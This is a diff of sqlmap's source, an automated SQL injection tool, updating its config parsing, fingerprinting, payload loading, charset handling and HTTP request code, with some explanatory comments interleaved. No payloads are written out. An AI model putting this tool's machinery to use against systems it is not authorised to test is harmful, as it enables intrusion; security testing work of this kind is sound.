 errMsg = "error occurred while processing the option "
 errMsg += "'%s' in provided configuration file ('%s')" % (option, getUnicode(ex))
 raise SqlmapSyntaxException(errMsg)
@@ -71,7 +71,7 @@ def configFileParser(configFile):
 try:
 config = UnicodeRawConfigParser()
 config.readfp(configFP)
-except Exception, ex:
+except Exception as ex:
 errMsg = "you have provided an invalid and/or unreadable configuration file ('%s')" % getSafeExString(ex)
 raise SqlmapSyntaxException(errMsg)
@@ -1,7 +1,7 @@
 #!/usr/bin/env python

 """
-Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """
@@ -35,7 +35,7 @@ class FingerprintHandler(ContentHandler):
 if key == "dbmsVersion":
 self._info[key] = value
 else:
-if key not in self._info.keys():
+if key not in self._info:
 self._info[key] = set()

 for _ in value.split("|"):
@@ -1,7 +1,7 @@
 #!/usr/bin/env python

 """
-Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """
@@ -13,7 +13,6 @@ from lib.core.data import kb
 from lib.core.data import paths
 from lib.parse.handler import FingerprintHandler


 def headersParser(headers):
 """
 This function calls a class that parses the input HTTP headers to
@@ -24,18 +23,16 @@ def headersParser(headers):
 if not kb.headerPaths:
 kb.headerPaths = {
 "microsoftsharepointteamservices": os.path.join(paths.SQLMAP_XML_BANNER_PATH, "sharepoint.xml"),
 "server": os.path.join(paths.SQLMAP_XML_BANNER_PATH, "server.xml"),
 "servlet-engine": os.path.join(paths.SQLMAP_XML_BANNER_PATH, "servlet-engine.xml"),
 "set-cookie": os.path.join(paths.SQLMAP_XML_BANNER_PATH, "set-cookie.xml"),
 "x-aspnet-version": os.path.join(paths.SQLMAP_XML_BANNER_PATH, "x-aspnet-version.xml"),
 "x-powered-by": os.path.join(paths.SQLMAP_XML_BANNER_PATH, "x-powered-by.xml"),
 }

-for header in itertools.ifilter(lambda x: x in kb.headerPaths, headers):
+for header in itertools.ifilter(lambda _: _ in kb.headerPaths, headers):
 value = headers[header]
 xmlfile = kb.headerPaths[header]

 handler = FingerprintHandler(value, kb.headersFp)

 parseXmlFile(xmlfile, handler)
 parseXmlFile(paths.GENERIC_XML, handler)
@@ -1,7 +1,7 @@
 #!/usr/bin/env python

 """
-Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """
@@ -9,6 +9,7 @@ import re

 from xml.sax.handler import ContentHandler

+from lib.core.common import urldecode
 from lib.core.common import parseXmlFile
 from lib.core.data import kb
 from lib.core.data import paths
@@ -26,6 +27,7 @@ class HTMLHandler(ContentHandler):
 self._dbms = None
 self._page = (page or "")
 self._lower_page = self._page.lower()
+self._urldecoded_page = urldecode(self._page)

 self.dbms = None

@@ -47,7 +49,7 @@ class HTMLHandler(ContentHandler):
 keywords = sorted(keywords, key=len)
 kb.cache.regex[regexp] = keywords[-1].lower()

-if kb.cache.regex[regexp] in self._lower_page and re.search(regexp, self._page, re.I):
+if kb.cache.regex[regexp] in self._lower_page and re.search(regexp, self._urldecoded_page, re.I):
 self.dbms = self._dbms
 self._markAsErrorPage()
@@ -1,11 +1,12 @@
 #!/usr/bin/env python

 """
-Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """

 import os
+import re

 from xml.etree import ElementTree as et

@@ -17,6 +18,9 @@ from lib.core.exception import SqlmapInstallationException
 from lib.core.settings import PAYLOAD_XML_FILES

 def cleanupVals(text, tag):
+if tag == "clause" and '-' in text:
+text = re.sub(r"(\d+)-(\d+)", lambda match: ','.join(str(_) for _ in xrange(int(match.group(1)), int(match.group(2)) + 1)), text)
+
 if tag in ("clause", "where"):
 text = text.split(',')

@@ -36,7 +40,7 @@ def cleanupVals(text, tag):
 return text

 def parseXmlNode(node):
-for element in node.getiterator('boundary'):
+for element in node.getiterator("boundary"):
 boundary = AttribDict()

 for child in element.getchildren():
@@ -48,7 +52,7 @@ def parseXmlNode(node):

 conf.boundaries.append(boundary)

-for element in node.getiterator('test'):
+for element in node.getiterator("test"):
 test = AttribDict()

 for child in element.getchildren():
@@ -74,11 +78,11 @@ def parseXmlNode(node):
 def loadBoundaries():
 try:
 doc = et.parse(paths.BOUNDARIES_XML)
-except Exception, ex:
+except Exception as ex:
 errMsg = "something appears to be wrong with "
 errMsg += "the file '%s' ('%s'). Please make " % (paths.BOUNDARIES_XML, getSafeExString(ex))
 errMsg += "sure that you haven't made any changes to it"
-raise SqlmapInstallationException, errMsg
+raise SqlmapInstallationException(errMsg)

 root = doc.getroot()
 parseXmlNode(root)
@@ -89,11 +93,11 @@ def loadPayloads():

 try:
 doc = et.parse(payloadFilePath)
-except Exception, ex:
+except Exception as ex:
 errMsg = "something appears to be wrong with "
 errMsg += "the file '%s' ('%s'). Please make " % (payloadFilePath, getSafeExString(ex))
 errMsg += "sure that you haven't made any changes to it"
-raise SqlmapInstallationException, errMsg
+raise SqlmapInstallationException(errMsg)

 root = doc.getroot()
 parseXmlNode(root)
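The lines added to `cleanupVals()` above expand numeric ranges inside a payload's `<clause>` value (for instance "1-3" into "1,2,3") before the value is split on commas. A rough standalone equivalent of that substitution, shown here only for illustration:

```python
import re

def expand_clause_ranges(text):
    # Replace every "<low>-<high>" span with the explicit comma-separated list,
    # mirroring the re.sub() + lambda added to cleanupVals() in the hunk above.
    return re.sub(r"(\d+)-(\d+)",
                  lambda match: ','.join(str(_) for _ in range(int(match.group(1)), int(match.group(2)) + 1)),
                  text)

print(expand_clause_ranges("1-3,9"))   # 1,2,3,9
```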
@@ -1,7 +1,7 @@
 #!/usr/bin/env python

 """
-Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """
@@ -32,7 +32,7 @@ def parseSitemap(url, retVal=None):
 content = Request.getPage(url=url, raise404=True)[0] if not abortedFlag else ""
 except httplib.InvalidURL:
 errMsg = "invalid URL given for sitemap ('%s')" % url
-raise SqlmapSyntaxException, errMsg
+raise SqlmapSyntaxException(errMsg)

 for match in re.finditer(r"<loc>\s*([^<]+)", content or ""):
 if abortedFlag:
@@ -1,7 +1,7 @@
 #!/usr/bin/env python

 """
-Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """
@@ -1,7 +1,7 @@
 #!/usr/bin/env python

 """
-Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """
@@ -17,12 +17,15 @@ from lib.core.common import Backend
 from lib.core.common import extractErrorMessage
 from lib.core.common import extractRegexResult
 from lib.core.common import getPublicTypeMembers
+from lib.core.common import getSafeExString
 from lib.core.common import getUnicode
+from lib.core.common import isListLike
 from lib.core.common import randomStr
 from lib.core.common import readInput
 from lib.core.common import resetCookieJar
 from lib.core.common import singleTimeLogMessage
 from lib.core.common import singleTimeWarnMessage
+from lib.core.common import unArrayizeValue
 from lib.core.data import conf
 from lib.core.data import kb
 from lib.core.data import logger
@@ -33,7 +36,6 @@ from lib.core.enums import PLACE
 from lib.core.exception import SqlmapCompressionException
 from lib.core.settings import BLOCKED_IP_REGEX
 from lib.core.settings import DEFAULT_COOKIE_DELIMITER
-from lib.core.settings import DEV_EMAIL_ADDRESS
 from lib.core.settings import EVENTVALIDATION_REGEX
 from lib.core.settings import MAX_CONNECTION_TOTAL_SIZE
 from lib.core.settings import META_CHARSET_REGEX
@@ -55,11 +57,11 @@ def forgeHeaders(items=None, base=None):

 items = items or {}

-for _ in items.keys():
+for _ in list(items.keys()):
 if items[_] is None:
 del items[_]

-headers = OrderedDict(base or conf.httpHeaders)
+headers = OrderedDict(conf.httpHeaders if base is None else base)
 headers.update(items.items())

 class _str(str):
@@ -108,7 +110,9 @@ def forgeHeaders(items=None, base=None):
 kb.mergeCookies = readInput(message, default='Y', boolean=True)

 if kb.mergeCookies and kb.injection.place != PLACE.COOKIE:
-_ = lambda x: re.sub(r"(?i)\b%s=[^%s]+" % (re.escape(getUnicode(cookie.name)), conf.cookieDel or DEFAULT_COOKIE_DELIMITER), ("%s=%s" % (getUnicode(cookie.name), getUnicode(cookie.value))).replace('\\', r'\\'), x)
+def _(value):
+return re.sub(r"(?i)\b%s=[^%s]+" % (re.escape(getUnicode(cookie.name)), conf.cookieDel or DEFAULT_COOKIE_DELIMITER), ("%s=%s" % (getUnicode(cookie.name), getUnicode(cookie.value))).replace('\\', r'\\'), value)

 headers[HTTP_HEADER.COOKIE] = _(headers[HTTP_HEADER.COOKIE])

 if PLACE.COOKIE in conf.parameters:
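The lambda-to-function rewrite above keeps the same behaviour: an existing cookie inside the outgoing `Cookie` header is rewritten with the value taken from the merged cookie jar. A hedged, self-contained approximation of that substitution (simplified, without sqlmap's configuration objects; the helper name is hypothetical):

```python
import re

def merge_cookie(header_value, name, value, delimiter=';'):
    # Case-insensitively replace "name=..." inside an existing Cookie header,
    # roughly what the rewritten helper in forgeHeaders() does above.
    return re.sub(r"(?i)\b%s=[^%s]+" % (re.escape(name), delimiter),
                  "%s=%s" % (name, value.replace('\\', r'\\')),
                  header_value)

print(merge_cookie("PHPSESSID=abc123; security=low", "security", "high"))
# PHPSESSID=abc123; security=high
```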
@@ -150,13 +154,16 @@ def checkCharEncoding(encoding, warn=True):
 'utf8'
 """

+if isListLike(encoding):
+encoding = unArrayizeValue(encoding)
+
 if encoding:
 encoding = encoding.lower()
 else:
 return encoding

 # Reference: http://www.destructor.de/charsets/index.htm
 translate = {"windows-874": "iso-8859-11", "utf-8859-1": "utf8", "en_us": "utf8", "macintosh": "iso-8859-1", "euc_tw": "big5_tw", "th": "tis-620", "unicode": "utf8", "utc8": "utf8", "ebcdic": "ebcdic-cp-be", "iso-8859": "iso8859-1", "iso-8859-0": "iso8859-1", "ansi": "ascii", "gbk2312": "gbk", "windows-31j": "cp932", "en": "us"}

 for delimiter in (';', ',', '('):
 if delimiter in encoding:
@@ -213,10 +220,6 @@ def checkCharEncoding(encoding, warn=True):
 try:
 codecs.lookup(encoding.encode(UNICODE_ENCODING) if isinstance(encoding, unicode) else encoding)
 except (LookupError, ValueError):
-if warn:
-warnMsg = "unknown web page charset '%s'. " % encoding
-warnMsg += "Please report by e-mail to '%s'" % DEV_EMAIL_ADDRESS
-singleTimeLogMessage(warnMsg, logging.WARN, encoding)
 encoding = None

 if encoding:
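The changes above make `checkCharEncoding()` tolerant of list-like input and drop the "report by e-mail" warning, while the overall normalize-then-validate flow stays the same. A condensed illustration of that flow follows; the translation table here is only a small fragment of the real one, and the function name is an assumption made for this sketch.

```python
import codecs

def normalize_charset(encoding):
    if not encoding:
        return None
    encoding = encoding.lower()
    # Map a few commonly mis-declared names onto Python codec names
    translate = {"utf-8859-1": "utf8", "windows-31j": "cp932", "ansi": "ascii"}
    encoding = translate.get(encoding, encoding)
    try:
        codecs.lookup(encoding)          # validate against Python's codec registry
    except (LookupError, ValueError):
        return None                      # unknown charset: caller falls back to heuristics
    return encoding

print(normalize_charset("ANSI"))         # ascii
```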
@@ -278,10 +281,10 @@ def decodePage(page, contentEncoding, contentType):
 raise Exception("size too large")

 page = data.read()
-except Exception, msg:
+except Exception as ex:
 if "<html" not in page: # in some cases, invalid "Content-Encoding" appears for plain HTML (should be ignored)
 errMsg = "detected invalid data for declared content "
-errMsg += "encoding '%s' ('%s')" % (contentEncoding, msg)
+errMsg += "encoding '%s' ('%s')" % (contentEncoding, getSafeExString(ex))
 singleTimeLogMessage(errMsg, logging.ERROR)

 warnMsg = "turning off page compression"
@@ -299,8 +302,7 @@ def decodePage(page, contentEncoding, contentType):

 metaCharset = checkCharEncoding(extractRegexResult(META_CHARSET_REGEX, page))

-if (any((httpCharset, metaCharset)) and not all((httpCharset, metaCharset)))\
-or (httpCharset == metaCharset and all((httpCharset, metaCharset))):
+if (any((httpCharset, metaCharset)) and not all((httpCharset, metaCharset))) or (httpCharset == metaCharset and all((httpCharset, metaCharset))):
 kb.pageEncoding = httpCharset or metaCharset # Reference: http://bytes.com/topic/html-css/answers/154758-http-equiv-vs-true-header-has-precedence
 debugMsg = "declared web page charset '%s'" % kb.pageEncoding
 singleTimeLogMessage(debugMsg, logging.DEBUG, debugMsg)
@@ -328,7 +330,7 @@ def decodePage(page, contentEncoding, contentType):

 kb.pageEncoding = kb.pageEncoding or checkCharEncoding(getHeuristicCharEncoding(page))

-if kb.pageEncoding and kb.pageEncoding.lower() == "utf-8-sig":
+if (kb.pageEncoding or "").lower() == "utf-8-sig":
 kb.pageEncoding = "utf-8"
 if page and page.startswith("\xef\xbb\xbf"): # Reference: https://docs.python.org/2/library/codecs.html (Note: noticed problems when "utf-8-sig" is left to Python for handling)
 page = page[3:]
@@ -341,7 +343,7 @@ def decodePage(page, contentEncoding, contentType):
 retVal = match.group(0)
 try:
 retVal = unichr(int(match.group(1)))
-except ValueError:
+except (ValueError, OverflowError):
 pass
 return retVal
 page = re.sub(r"&#(\d+);", _, page)
@@ -384,7 +386,7 @@ def processResponse(page, responseHeaders, status=None):
|
|||||||
continue
|
continue
|
||||||
|
|
||||||
conf.paramDict[PLACE.POST][name] = value
|
conf.paramDict[PLACE.POST][name] = value
|
||||||
conf.parameters[PLACE.POST] = re.sub(r"(?i)(%s=)[^&]+" % re.escape(name), r"\g<1>%s" % re.escape(value), conf.parameters[PLACE.POST])
|
conf.parameters[PLACE.POST] = re.sub(r"(?i)(%s=)[^&]+" % re.escape(name), r"\g<1>%s" % value.replace('\\', r'\\'), conf.parameters[PLACE.POST])
|
||||||
|
|
||||||
if not kb.browserVerification and re.search(r"(?i)browser.?verification", page or ""):
|
if not kb.browserVerification and re.search(r"(?i)browser.?verification", page or ""):
|
||||||
kb.browserVerification = True
|
kb.browserVerification = True
|
||||||
|
|||||||
@@ -1,7 +1,7 @@
 #!/usr/bin/env python

 """
-Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """

@@ -30,10 +30,8 @@ class SmartHTTPBasicAuthHandler(urllib2.HTTPBasicAuthHandler):
 self.retried_count = 0
 else:
 if self.retried_count > 5:
-raise urllib2.HTTPError(req.get_full_url(), 401, "basic auth failed",
-headers, None)
+raise urllib2.HTTPError(req.get_full_url(), 401, "basic auth failed", headers, None)
 else:
 self.retried_count += 1

-return urllib2.HTTPBasicAuthHandler.http_error_auth_reqed(
-self, auth_header, host, req, headers)
+return urllib2.HTTPBasicAuthHandler.http_error_auth_reqed(self, auth_header, host, req, headers)
@@ -1,7 +1,7 @@
 #!/usr/bin/env python

 """
-Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """

@@ -106,16 +106,21 @@ def _comparison(page, headers, code, getRatioValue, pageLength):
 # Preventing "Unicode equal comparison failed to convert both arguments to Unicode"
 # (e.g. if one page is PDF and the other is HTML)
 if isinstance(seqMatcher.a, str) and isinstance(page, unicode):
-page = page.encode(kb.pageEncoding or DEFAULT_PAGE_ENCODING, 'ignore')
+page = page.encode(kb.pageEncoding or DEFAULT_PAGE_ENCODING, "ignore")
 elif isinstance(seqMatcher.a, unicode) and isinstance(page, str):
-seqMatcher.a = seqMatcher.a.encode(kb.pageEncoding or DEFAULT_PAGE_ENCODING, 'ignore')
+seqMatcher.a = seqMatcher.a.encode(kb.pageEncoding or DEFAULT_PAGE_ENCODING, "ignore")

-if seqMatcher.a and page and seqMatcher.a == page:
-ratio = 1
+if any(_ is None for _ in (page, seqMatcher.a)):
+return None
+elif seqMatcher.a and page and seqMatcher.a == page:
+ratio = 1.
 elif kb.skipSeqMatcher or seqMatcher.a and page and any(len(_) > MAX_DIFFLIB_SEQUENCE_LENGTH for _ in (seqMatcher.a, page)):
-ratio = 1.0 * len(seqMatcher.a) / len(page)
-if ratio > 1:
-ratio = 1. / ratio
+if not page or not seqMatcher.a:
+return float(seqMatcher.a == page)
+else:
+ratio = 1. * len(seqMatcher.a) / len(page)
+if ratio > 1:
+ratio = 1. / ratio
 else:
 seq1, seq2 = None, None

@@ -132,10 +137,14 @@ def _comparison(page, headers, code, getRatioValue, pageLength):
 seq1 = seq1.replace(REFLECTED_VALUE_MARKER, "")
 seq2 = seq2.replace(REFLECTED_VALUE_MARKER, "")

+if kb.heavilyDynamic:
+seq1 = seq1.split("\n")
+seq2 = seq2.split("\n")

 seqMatcher.set_seq1(seq1)
 seqMatcher.set_seq2(seq2)

-ratio = round(seqMatcher.quick_ratio(), 3)
+ratio = round(seqMatcher.quick_ratio() if not kb.heavilyDynamic else seqMatcher.ratio(), 3)

 # If the url is stable and we did not set yet the match ratio and the
 # current injected value changes the url page content
@@ -1,14 +1,13 @@
 #!/usr/bin/env python

 """
-Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """

 import binascii
 import compiler
 import httplib
-import json
 import keyword
 import logging
 import re

@@ -17,6 +16,7 @@ import string
 import struct
 import time
 import traceback
+import urllib
 import urllib2
 import urlparse

@@ -34,6 +34,7 @@ from lib.core.common import calculateDeltaSeconds
 from lib.core.common import checkSameHost
 from lib.core.common import clearConsoleLine
 from lib.core.common import dataToStdout
+from lib.core.common import escapeJsonValue
 from lib.core.common import evaluateCode
 from lib.core.common import extractRegexResult
 from lib.core.common import findMultipartPostBoundary

@@ -43,6 +44,7 @@ from lib.core.common import getHostHeader
 from lib.core.common import getRequestHeader
 from lib.core.common import getSafeExString
 from lib.core.common import getUnicode
+from lib.core.common import isMultiThreadMode
 from lib.core.common import logHTTPTraffic
 from lib.core.common import pushValue
 from lib.core.common import popValue

@@ -63,10 +65,13 @@ from lib.core.common import urlencode
 from lib.core.data import conf
 from lib.core.data import kb
 from lib.core.data import logger
+from lib.core.datatype import AttribDict
+from lib.core.decorators import stackedmethod
 from lib.core.dicts import POST_HINT_CONTENT_TYPES
 from lib.core.enums import ADJUST_TIME_DELAY
 from lib.core.enums import AUTH_TYPE
 from lib.core.enums import CUSTOM_LOGGING
+from lib.core.enums import HINT
 from lib.core.enums import HTTP_HEADER
 from lib.core.enums import HTTPMETHOD
 from lib.core.enums import NULLCONNECTION

@@ -74,7 +79,7 @@ from lib.core.enums import PAYLOAD
 from lib.core.enums import PLACE
 from lib.core.enums import POST_HINT
 from lib.core.enums import REDIRECTION
-from lib.core.enums import WEB_API
+from lib.core.enums import WEB_PLATFORM
 from lib.core.exception import SqlmapCompressionException
 from lib.core.exception import SqlmapConnectionException
 from lib.core.exception import SqlmapGenericException

@@ -86,6 +91,7 @@ from lib.core.settings import BOUNDARY_BACKSLASH_MARKER
 from lib.core.settings import DEFAULT_CONTENT_TYPE
 from lib.core.settings import DEFAULT_COOKIE_DELIMITER
 from lib.core.settings import DEFAULT_GET_POST_DELIMITER
+from lib.core.settings import DEFAULT_USER_AGENT
 from lib.core.settings import EVALCODE_KEYWORD_SUFFIX
 from lib.core.settings import HTTP_ACCEPT_HEADER_VALUE
 from lib.core.settings import HTTP_ACCEPT_ENCODING_HEADER_VALUE

@@ -96,6 +102,8 @@ from lib.core.settings import MAX_CONSECUTIVE_CONNECTION_ERRORS
 from lib.core.settings import MAX_MURPHY_SLEEP_TIME
 from lib.core.settings import META_REFRESH_REGEX
 from lib.core.settings import MIN_TIME_RESPONSES
+from lib.core.settings import MAX_TIME_RESPONSES
+from lib.core.settings import IPS_WAF_CHECK_PAYLOAD
 from lib.core.settings import IS_WIN
 from lib.core.settings import LARGE_CHUNK_TRIM_MARKER
 from lib.core.settings import PAYLOAD_DELIMITER

@@ -118,7 +126,6 @@ from lib.request.methodrequest import MethodRequest
 from thirdparty.odict.odict import OrderedDict
 from thirdparty.socks.socks import ProxyError

 class Connect(object):
 """
 This class defines methods used to perform HTTP requests
@@ -168,9 +175,11 @@ class Connect(object):
 warnMsg += "(e.g. 'https://help.ubuntu.com/community/Tor')"
 else:
 warnMsg = "if the problem persists please check that the provided "
-warnMsg += "target URL is valid. In case that it is, you can try to rerun "
-warnMsg += "with the switch '--random-agent' turned on "
-warnMsg += "and/or proxy switches ('--ignore-proxy', '--proxy',...)"
+warnMsg += "target URL is reachable. In case that it is, "
+warnMsg += "you can try to rerun with "
+if not conf.randomAgent:
+warnMsg += "switch '--random-agent' and/or "
+warnMsg += "proxy switches ('--ignore-proxy', '--proxy',...)"
 singleTimeWarnMessage(warnMsg)

 elif conf.threads > 1:

@@ -187,13 +196,13 @@ class Connect(object):

 if not kb.dnsMode and conn:
 headers = conn.info()
-if headers and hasattr(headers, "getheader") and (headers.getheader(HTTP_HEADER.CONTENT_ENCODING, "").lower() in ("gzip", "deflate")\
-or "text" not in headers.getheader(HTTP_HEADER.CONTENT_TYPE, "").lower()):
+if kb.pageCompress and headers and hasattr(headers, "getheader") and (headers.getheader(HTTP_HEADER.CONTENT_ENCODING, "").lower() in ("gzip", "deflate") or "text" not in headers.getheader(HTTP_HEADER.CONTENT_TYPE, "").lower()):
 retVal = conn.read(MAX_CONNECTION_TOTAL_SIZE)
 if len(retVal) == MAX_CONNECTION_TOTAL_SIZE:
 warnMsg = "large compressed response detected. Disabling compression"
 singleTimeWarnMessage(warnMsg)
 kb.pageCompress = False
+raise SqlmapCompressionException
 else:
 while True:
 if not conn:
@@ -241,27 +250,28 @@ class Connect(object):
 kb.requestCounter += 1
 threadData.lastRequestUID = kb.requestCounter

 url = kwargs.get("url", None) or conf.url
 get = kwargs.get("get", None)
 post = kwargs.get("post", None)
 method = kwargs.get("method", None)
 cookie = kwargs.get("cookie", None)
 ua = kwargs.get("ua", None) or conf.agent
 referer = kwargs.get("referer", None) or conf.referer
 host = kwargs.get("host", None) or conf.host
 direct_ = kwargs.get("direct", False)
 multipart = kwargs.get("multipart", None)
 silent = kwargs.get("silent", False)
 raise404 = kwargs.get("raise404", True)
 timeout = kwargs.get("timeout", None) or conf.timeout
 auxHeaders = kwargs.get("auxHeaders", None)
 response = kwargs.get("response", False)
 ignoreTimeout = kwargs.get("ignoreTimeout", False) or kb.ignoreTimeout or conf.ignoreTimeouts
 refreshing = kwargs.get("refreshing", False)
 retrying = kwargs.get("retrying", False)
 crawling = kwargs.get("crawling", False)
 checking = kwargs.get("checking", False)
 skipRead = kwargs.get("skipRead", False)
+finalCode = kwargs.get("finalCode", False)

 if multipart:
 post = multipart
@@ -346,7 +356,7 @@ class Connect(object):
 requestMsg += " %s" % httplib.HTTPConnection._http_vsn_str

 # Prepare HTTP headers
-headers = forgeHeaders({HTTP_HEADER.COOKIE: cookie, HTTP_HEADER.USER_AGENT: ua, HTTP_HEADER.REFERER: referer, HTTP_HEADER.HOST: host})
+headers = forgeHeaders({HTTP_HEADER.COOKIE: cookie, HTTP_HEADER.USER_AGENT: ua, HTTP_HEADER.REFERER: referer, HTTP_HEADER.HOST: host}, base=None if target else {})

 if HTTP_HEADER.COOKIE in headers:
 cookie = headers[HTTP_HEADER.COOKIE]

@@ -357,14 +367,21 @@ class Connect(object):
 if kb.proxyAuthHeader:
 headers[HTTP_HEADER.PROXY_AUTHORIZATION] = kb.proxyAuthHeader

-if not getHeader(headers, HTTP_HEADER.ACCEPT):
-headers[HTTP_HEADER.ACCEPT] = HTTP_ACCEPT_HEADER_VALUE
+if not conf.requestFile or not target:
+if not getHeader(headers, HTTP_HEADER.HOST):
+headers[HTTP_HEADER.HOST] = getHostHeader(url)

-if not getHeader(headers, HTTP_HEADER.HOST) or not target:
-headers[HTTP_HEADER.HOST] = getHostHeader(url)
+if not getHeader(headers, HTTP_HEADER.ACCEPT):
+headers[HTTP_HEADER.ACCEPT] = HTTP_ACCEPT_HEADER_VALUE

 if not getHeader(headers, HTTP_HEADER.ACCEPT_ENCODING):
 headers[HTTP_HEADER.ACCEPT_ENCODING] = HTTP_ACCEPT_ENCODING_HEADER_VALUE if kb.pageCompress else "identity"

+elif conf.requestFile and getHeader(headers, HTTP_HEADER.USER_AGENT) == DEFAULT_USER_AGENT:
+for header in headers:
+if header.upper() == HTTP_HEADER.USER_AGENT.upper():
+del headers[header]
+break

 if post is not None and not multipart and not getHeader(headers, HTTP_HEADER.CONTENT_TYPE):
 headers[HTTP_HEADER.CONTENT_TYPE] = POST_HINT_CONTENT_TYPES.get(kb.postHint, DEFAULT_CONTENT_TYPE)

@@ -381,10 +398,6 @@ class Connect(object):
 if conf.keepAlive:
 headers[HTTP_HEADER.CONNECTION] = "keep-alive"

-# Reset header values to original in case of provided request file
-if target and conf.requestFile:
-headers = forgeHeaders({HTTP_HEADER.COOKIE: cookie})

 if auxHeaders:
 headers = forgeHeaders(auxHeaders, headers)

@@ -407,8 +420,10 @@ class Connect(object):
 ws.close()
 code = ws.status
 status = httplib.responses[code]

 class _(dict):
 pass

 responseHeaders = _(ws.getheaders())
 responseHeaders.headers = ["%s: %s\r\n" % (_[0].capitalize(), _[1]) for _ in responseHeaders.items()]

@@ -428,8 +443,10 @@ class Connect(object):
 method = unicodeencode(method)
 req = MethodRequest(url, post, headers)
 req.set_method(method)
-else:
+elif url is not None:
 req = urllib2.Request(url, post, headers)
+else:
+return None, None, None

 requestHeaders += "\r\n".join(["%s: %s" % (getUnicode(key.capitalize() if isinstance(key, basestring) else key), getUnicode(value)) for (key, value) in req.header_items()])
@@ -479,23 +496,23 @@ class Connect(object):

 # Get HTTP response
 if hasattr(conn, "redurl"):
-page = (threadData.lastRedirectMsg[1] if kb.redirectChoice == REDIRECTION.NO\
-else Connect._connReadProxy(conn)) if not skipRead else None
+page = (threadData.lastRedirectMsg[1] if kb.redirectChoice == REDIRECTION.NO else Connect._connReadProxy(conn)) if not skipRead else None
 skipLogTraffic = kb.redirectChoice == REDIRECTION.NO
-code = conn.redcode
+code = conn.redcode if not finalCode else code
 else:
 page = Connect._connReadProxy(conn) if not skipRead else None

 if conn:
-code = conn.code
+code = (code or conn.code) if conn.code == kb.originalCode else conn.code # do not override redirection code (for comparison purposes)
 responseHeaders = conn.info()
 responseHeaders[URI_HTTP_HEADER] = conn.geturl()
+kb.serverHeader = responseHeaders.get(HTTP_HEADER.SERVER, kb.serverHeader)
 else:
 code = None
 responseHeaders = {}

 page = decodePage(page, responseHeaders.get(HTTP_HEADER.CONTENT_ENCODING), responseHeaders.get(HTTP_HEADER.CONTENT_TYPE))
-status = getUnicode(conn.msg) if conn else None
+status = getUnicode(conn.msg) if conn and getattr(conn, "msg", None) else None

 kb.connErrorCounter = 0
@@ -540,11 +557,11 @@ class Connect(object):
 if hasattr(conn.fp, '_sock'):
 conn.fp._sock.close()
 conn.close()
-except Exception, ex:
+except Exception as ex:
 warnMsg = "problem occurred during connection closing ('%s')" % getSafeExString(ex)
 logger.warn(warnMsg)

-except SqlmapConnectionException, ex:
+except SqlmapConnectionException as ex:
 if conf.proxyList and not kb.threadException:
 warnMsg = "unable to connect to the target URL ('%s')" % ex
 logger.critical(warnMsg)

@@ -553,7 +570,7 @@ class Connect(object):
 else:
 raise

-except urllib2.HTTPError, ex:
+except urllib2.HTTPError as ex:
 page = None
 responseHeaders = None

@@ -578,13 +595,13 @@ class Connect(object):
 page = page if isinstance(page, unicode) else getUnicode(page)

 code = ex.code
-status = getUnicode(ex.msg)
+status = getSafeExString(ex)

 kb.originalCode = kb.originalCode or code
 threadData.lastHTTPError = (threadData.lastRequestUID, code, status)
 kb.httpErrorCodes[code] = kb.httpErrorCodes.get(code, 0) + 1

-responseMsg += "[#%d] (%d %s):\r\n" % (threadData.lastRequestUID, code, status)
+responseMsg += "[#%d] (%s %s):\r\n" % (threadData.lastRequestUID, code, status)

 if responseHeaders:
 logHeaders = "\r\n".join(["%s: %s" % (getUnicode(key.capitalize() if isinstance(key, basestring) else key), getUnicode(value)) for (key, value) in responseHeaders.items()])
@@ -642,15 +659,8 @@ class Connect(object):
 elif "forcibly closed" in tbMsg or "Connection is already closed" in tbMsg:
 warnMsg = "connection was forcibly closed by the target URL"
 elif "timed out" in tbMsg:
-if not conf.disablePrecon:
-singleTimeWarnMessage("turning off pre-connect mechanism because of connection time out(s)")
-conf.disablePrecon = True

-if kb.testMode and kb.testType not in (PAYLOAD.TECHNIQUE.TIME, PAYLOAD.TECHNIQUE.STACKED):
-kb.responseTimes.clear()

 if kb.testMode and kb.testType not in (None, PAYLOAD.TECHNIQUE.TIME, PAYLOAD.TECHNIQUE.STACKED):
-singleTimeWarnMessage("there is a possibility that the target (or WAF/IPS/IDS) is dropping 'suspicious' requests")
+singleTimeWarnMessage("there is a possibility that the target (or WAF/IPS) is dropping 'suspicious' requests")
 kb.droppingRequests = True
 warnMsg = "connection timed out to the target URL"
 elif "Connection reset" in tbMsg:

@@ -659,7 +669,7 @@ class Connect(object):
 conf.disablePrecon = True

 if kb.testMode:
-singleTimeWarnMessage("there is a possibility that the target (or WAF/IPS/IDS) is resetting 'suspicious' requests")
+singleTimeWarnMessage("there is a possibility that the target (or WAF/IPS) is resetting 'suspicious' requests")
 kb.droppingRequests = True
 warnMsg = "connection reset to the target URL"
 elif "URLError" in tbMsg or "error" in tbMsg:

@@ -684,6 +694,9 @@ class Connect(object):
 status = re.search(r"Handshake status ([\d]{3})", tbMsg)
